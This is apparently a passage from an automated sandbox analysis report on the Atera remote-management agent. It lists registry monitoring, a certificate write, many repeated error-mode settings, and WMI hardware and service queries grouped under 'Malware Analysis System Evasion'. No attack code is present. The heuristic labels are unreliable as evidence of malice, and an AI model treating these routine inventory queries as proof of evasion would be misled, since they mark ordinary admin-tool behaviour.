                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3EA524 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,35_2_00007FFDEE3EA524
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                                Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID="\\\\.\\PHYSICALDRIVE0"} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent="Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSMBios_RawSMBiosTables
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name='MSExchangeIS' OR DisplayName='MSExchangeIS'
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
